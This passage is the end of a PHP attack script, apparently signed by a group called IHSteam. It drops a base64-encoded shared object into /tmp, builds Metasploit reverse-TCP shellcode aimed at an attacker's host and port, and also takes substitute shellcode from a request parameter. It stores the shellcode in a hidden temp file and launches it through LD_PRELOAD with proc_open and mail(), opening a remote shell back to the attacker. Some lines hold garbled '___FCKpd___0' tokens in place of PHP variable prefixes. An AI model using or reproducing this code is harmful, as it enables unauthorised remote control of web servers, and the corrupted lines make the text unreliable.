AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAAAAAABAAwAAAAAAAAMABwAAAAAA
YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAAAAAAMACgAAAAAAIAQAAAAAAAAD
AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAAAARAYAAAAAAAADAA4AAAAAAAwf
AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAAADABEAAAAAACAfAAAAAAAAAwAS
AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAABggAAAAAAAAAwAVAAAAAAAcIAAA
AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABADx/w0AAAD0HwAAAAAAAAEC8f8j
AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQAAAAAAAAICCwBUAAAAIB8AAAAA
AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAAAAAAAAAAAgAAAAkAAA
AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAHoAAAASAAAAugAAABwgAAAAAAAA
EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA
AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAAAAEgAJAABzaGVsbGNvZGUuYwBf
R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRFRPUl9FTkRfXwBfX2k2ODYuZ2V0
X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMABfX2dtb25fc3RhcnRfXwBfSnZf
UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2ZpbmkAcmVhZEBAR0xJQkNfMi4w
AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV9maW5hbGl6ZUBAR0xJQkNfMi4x
LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ;
}
if (!function_exists('file_put_contents')){
function file_put_contents($filename, $data){
$f = @fopen($filename, 'w');
if (!$f){
return false;
}
else{
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
$ip = gethostbyname($host);
$port1 = sprintf('%c', ($port>> 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* http://www.metasploit.com
* Encoder: generic/none
* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false
*/
$Xshellcode =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80".
"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2."\x66\x53\x6a\x10".
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f".
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69".
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x00" ;
if(isset(___FCKpd___0
REQUEST['shellcode'])){
// just for fans of metasploit
$Xshellcode=base64_decode(___FCKpd___0
REQUEST['shellcode']);
}
file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
$cwd = '/tmp/';
$env = array('LD_PRELOAD' => '/tmp/shellcode.so');
unset($var);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
// BOOM
proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
mail("IHSteam","IHSteam","IHSteam","IHSteam");
?>
|